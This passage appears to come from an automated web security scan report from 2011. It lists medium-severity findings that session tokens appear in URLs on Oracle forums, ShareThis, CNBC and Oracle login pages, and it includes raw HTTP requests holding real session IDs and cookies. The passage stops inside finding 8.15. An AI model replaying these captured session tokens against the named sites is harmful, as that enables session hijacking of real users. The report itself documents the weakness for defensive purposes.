<br><IMG alt="" src="/forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" width=1 height=8 border=0></td>
...[SNIP]...
<em>


   <a href="/forums/index.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=84">Forum Home</a>


&raquo;
<a href="/forums/category.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18">Database</a>
...[SNIP]...
<td class="jive-acc-login">


<a href="/forums/login!withRedirect.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0">
Sign In</a>
...[SNIP]...
<td class="jive-acc-cp"><a href="/forums/guestsettings!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0">Guest Settings</a>
...[SNIP]...
<td class="jive-acc-search"><a href="/forums/search!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" title="Search">Search</a>
...[SNIP]...
<td class="jive-acc-help"><a href="/forums/help.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" title="FAQ" target="_blank">FAQ</a>
...[SNIP]...
<li class="jive-tagset-popularity8" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re010g?categoryID=18"
title = "Used 7977 times" >
10g</a >
...[SNIP]...
<li class="jive-tagset-popularity3" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re011g?categoryID=18"
title = "Used 4147 times" >
11g</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re09i?categoryID=18"
title = "Used 1253 times" >
9i</a >
...[SNIP]...
<li class="jive-tagset-popularity9" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0apex?categoryID=18"
title = "Used 9640 times" >
apex</a >
...[SNIP]...
<li class="jive-tagset-popularity3" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0database?categoryID=18"
title = "Used 3705 times" >
database</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0dba?categoryID=18"
title = "Used 1155 times" >
dba</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0error?categoryID=18"
title = "Used 1587 times" >
error</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0installation?categoryID=18"
title = "Used 1112 times" >
installation</a >
...[SNIP]...
<li class="jive-tagset-popularity3" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0oracle?categoryID=18"
title = "Used 4074 times" >
oracle</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0performance?categoryID=18"
title = "Used 1241 times" >
performance</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0pl_sql?categoryID=18"
title = "Used 1607 times" >
pl_sql</a >
...[SNIP]...
<li class="jive-tagset-popularity1" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0plsql?categoryID=18"
title = "Used 2380 times" >
plsql</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0report?categoryID=18"
title = "Used 954 times" >
report</a >
...[SNIP]...
<li class="jive-tagset-popularity0" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0rman?categoryID=18"
title = "Used 904 times" >
rman</a >
...[SNIP]...
<li class="jive-tagset-popularity3" >
<a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0sql?categoryID=18"
title = "Used 4069 times" >
sql</a >
...[SNIP]...
<span><a href="/forums/tags;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18">View all</a>
...[SNIP]...
<a href="http://www.oracle.com/us/corporate/index.html"><img alt="Hardware and Software Engineered to Work Together" src="/forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" border="0" height="34" width="182"></a>
...[SNIP]...
<a href="http://www.oracle.com/us/syndication/feeds/index.html"><img style="margin-bottom: 1px;" alt="Oracle RSS Feeds" src="/forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" align="absmiddle" border="0" height="14" width="14"></a>
...[SNIP]...
<!-- SiteCatalyst code -->
<script language="JavaScript" src="/forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b"></script>
<script language="JavaScript" src="/forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b"></script>
...[SNIP]...

8.3. https://forums.oracle.com/forums/main.jspa

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/main.jspa

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343589432; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=51417741.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Content-Length: 246459
Date: Tue, 06 Sep 2011 16:13:42 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<title>OTN Discussion Forums : Forum Home</title>
<meta http-equiv="content-type" content="
...[SNIP]...

8.4. https://forums.oracle.com/forums/style/style.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/style/style.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/style/style.jsp;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Content-Language: en-IN
Last-Modified: Thu, 28 Aug 2008 03:01:38 GMT
ETag: "STYLE_JSP_ETAG"
Content-Type: text/css; charset=UTF-8
Content-Length: 48579
Date: Tue, 06 Sep 2011 16:13:17 GMT
Connection: keep-alive
Vary: Accept-Encoding


/* --------------------------------------------- */
/* Global Jive Forums 5.x Stylesheet */
/* --------------------------------------------- */

/* ---------------------------------
...[SNIP]...

8.5. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/feed-icon-14x14.jpg

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:08 GMT
ETag: "5.5.30-ad155f4dae3c8bbb7b41e77153238054-503"
Content-Type: text/plain
Content-Length: 503
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

......JFIF.....G.G.....C...........    ...    .......

.

........................... ...C.............. ..........................................
...[SNIP]...

8.6. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/info_company.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT
ETag: "5.5.30-31aaea14c05fcefb6736e09849bcc8e4-1711"
Content-Type: text/plain
Content-Length: 1711
Date: Tue, 06 Sep 2011 16:13:19 GMT
Connection: keep-alive

GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ.
...[SNIP]...

8.7. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/oralogo_small.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT
ETag: "5.5.30-82f0a9b75571a56326f5d9340ef962ef-2059"
Content-Type: text/plain
Content-Length: 2059
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

8.8. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/otn_new.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:10 GMT
ETag: "5.5.30-50ebcb915812177e8f99db0d9eb394bd-18986"
Content-Type: text/plain
Content-Length: 18986
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive
Vary: Accept-Encoding

/* MASTER FONT FACES */
BODY,H1,H2,H3,H4 {font-family:arial,helvetica,sans-serif;}

/* used to remove double space issue in pre tags*/
.jive-message-body pre br, textEditor pre br { display:none;
...[SNIP]...

8.9. https://forums.oracle.com/forums/themes/english/resources/s_code.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/s_code.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-efb6224f9f8ad100cccc06d67aaeea0a-29511"
Content-Type: text/plain
Content-Length: 29511
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

8.10. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/s_code_forums.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-82e1f8bbd97835a17866085b364ebf72-5398"
Content-Type: text/plain
Content-Length: 5398
Date: Tue, 06 Sep 2011 16:13:17 GMT
Connection: keep-alive

/* Setting the s_account */
function s_setAccount(){
var s_account="";
var curUrl = location.href;
   
       if(curUrl.indexOf("-stage") != -1 ) {
               s_account = "oracledevall,oracledevforum1";
       }
...[SNIP]...

8.11. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/spacer.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:11 GMT
ETag: "5.5.30-c895ce2a9c0546d80965bd3eeafcf070-43"
Content-Type: text/plain
Content-Length: 43
Date: Tue, 06 Sep 2011 16:13:20 GMT
Connection: keep-alive

GIF89a.............!.......,...........D..;

8.12. https://forums.oracle.com/forums/themes/english/resources/style.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://forums.oracle.com
Path:   /forums/themes/english/resources/style.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /forums/themes/english/resources/style.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1
Host: forums.oracle.com
Connection: keep-alive
Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-454e44ddb000046027da50612f1e4157-45429"
Content-Type: text/plain
Content-Length: 45429
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive
Vary: Accept-Encoding


/* --------------------------------------------- */
/* Global Jive Forums 5.x Stylesheet */
/* --------------------------------------------- */

/* ----------------------------------
...[SNIP]...

8.13. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share5x&publisher=4321fb91-a13e-47c8-8a96-426495c5931a&hostname=www.tenzing.com&location=%2Fatg-ecommerce-hosting.asp&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC&sessionID=1315341130568.42115&fpc=d5ad7d-1324070db49-4656e66c-1&ts1315341131009.0&refDomain=www.google.com&refQuery=sourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Tue, 06 Sep 2011 15:32:11 GMT
Connection: keep-alive


8.14. https://login.cnbc.com/cas/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:33 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...

8.15. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

